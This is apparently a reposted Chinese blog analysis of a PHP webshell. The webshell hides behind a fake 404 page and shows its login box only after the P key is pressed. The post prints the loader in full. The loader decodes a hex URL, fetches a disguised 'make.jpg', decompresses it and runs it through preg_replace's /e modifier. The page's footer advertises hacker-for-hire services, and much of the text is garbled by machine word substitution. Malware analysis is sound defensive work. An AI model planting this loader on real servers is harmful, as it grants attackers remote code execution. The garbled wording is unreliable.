一款奇葩的PHP Webshell后门剖析

访客5年前黑客工具878

 

近来,360网站卫兵安全团队近期捕获一个依据PHP完成的webshell样本,其奇妙的代码动态生成 *** ,鄙陋的本身页面假装 *** ,让咱们在剖析这个样本的过程中感受到相当多的趣味。接下来就让咱们一起共赏这个奇葩的Webshell吧。
 

Webshell代码如下:

<?php
error_reporting(0);
session_start();
header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api']))
$_SESSION['api']=substr(file_get_contents(
sprintf('%s?%s',pack("H*",
'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649);
@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);
?>

要害看下面这句代码,

sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())

这儿履行之后其实是一张图片,解密出来的图片地址如下:

http://7shell.googlecode.com/svn/make.jpg?53280b00f1e85

然后调用file_get_contents函数读取图片为字符串,然后substr取3649字节之后的内容,再调用gzuncompress解压,得到真实的代码。最终调用preg_replace的修饰符e来履行歹意代码的。这儿履行以下句子来复原出歹意样本代码,

<?php
echo gzuncompress(substr(file_get_contents(sprintf('%s?%s',pack("H*",
'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649));
?>

如图所示:

剖析这段代码,发现这是一个假装的404木马(这儿实在是太鄙陋了…把页面标题改成404 Not Found),其实整个webshell就一个class外加三个function,如下图:
首要我先看一下它的前端html代码,其中有这么一段js程序

document.onkeydown = function(e) {
var theEvent = window.event || e;
var code = theEvent.keyCode || theEvent.which;
if (80 == code) {
$("login").style.display = "block"
}
}

这儿它用document.onkeydown获取用户敲击键盘事情,当code等于80的时分显现login这个div,这儿查询了一下keyCode的对照表,查到80对应p和P键

所以触发webshell登陆需要按p键(不按P键页面便是一个空白页,看不到登陆框),如图所示:

再回到服务端php代码中,能够看到程序用的是对称加密,而且将登陆暗码作为加密key,代码如图所示:

再看init()的逻辑
如图所示,先看这句代码

$true = @gzuncompress(gzuncompress(Crypt::decrypt(pack('H*', '789c63ac0bbec7b494f12cdb02f6dfac3f833731c
f093e163a892990793ebf0a9f1c6b18bb68983b3b47a022002a840c59′), $_POST['key'], true)));

依据这个解密逻辑咱们能够推出,这儿其实是将字符串true做了以下加密处理,

unpack('H*',Crypt::encrypt(gzcompress(gzcompress('true')), $_POST['key'] , true))

所以当输入正确暗码的时分@gzuncompress回来字符串true,然后程序调用setcookie给客户端回来$_COOKIE['key'],然后值得提一下的是后边这个exit('{"status":"on"}'),这儿它与前端代码联络很严密,咱们看前端有个callback函数,如下

function callback() {
var json = eval("(" + this.responseText + ")");
if (json.status=='on'){
window.location.reload();
return;
}
if (json.notice) {
$("notice").style.display = "block";
$("notice").innerHTML = json.notice;
sideOut();
}
}

这儿履行exit('{"status":"on"}')会回来json串{"status":"on"},此刻前端js代码clas *** ack()获取到此响应会履行window.location.reload()改写,再次恳求正好带上前面获取的cookie,然后履行判别COOKIE的逻辑,如图所示:

[1] [2]  黑客接单网

相关文章

为什么曾经深爱的老婆跟我分手,是因为我赌博的伤

我使用的复现环境是:https://pivotal.io/security/cve-2019-3799192.168.123.62为什么曾经深爱的老婆跟我分手,是因为我赌博的伤, Unit 42安全研...

网络游戏黑客接单_微信破解

实际上,这些歹意安排的技能水平和运营手法,决议了他们在得知自己现已进入公众视界之后所作出的反响。 有些歹意安排会直接抛弃他们的歹意活动,并进入到整理痕迹的阶段,而其他一些歹意安排会照常进行他们的活动。...

接单黑客_高考黑客找试卷答案

一、多样化的进犯投进办法Powersploit和Nishang是老牌后浸透运用结构,集成了后门,提权,信息搜集,RCE等功用。 Rank 2018 Password(前25)接单黑客,高考黑客找试卷答...

dsploit,找黑客帮我找个ip,淘宝找黑客接单

12</script>途径:/wish.php履行Shell指令3、运用发掘鸡和一个ASP木马:help KEYWORD: 具体协助信息 五、set:该指令用于为当时运用的explo...

找本书开头是男主角是黑客,女友被富二代骗走,关

https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708官方补丁再来看看struct _...

游戏黑客接单网,黑客找的到吗,在哪找手机定位黑客

“运用一个 Gmail Android缝隙能够让我伪造发件者邮箱地址。 谷歌说这不是一个安全问题。 ”Zhu写到。 news.maiyadi.com "c...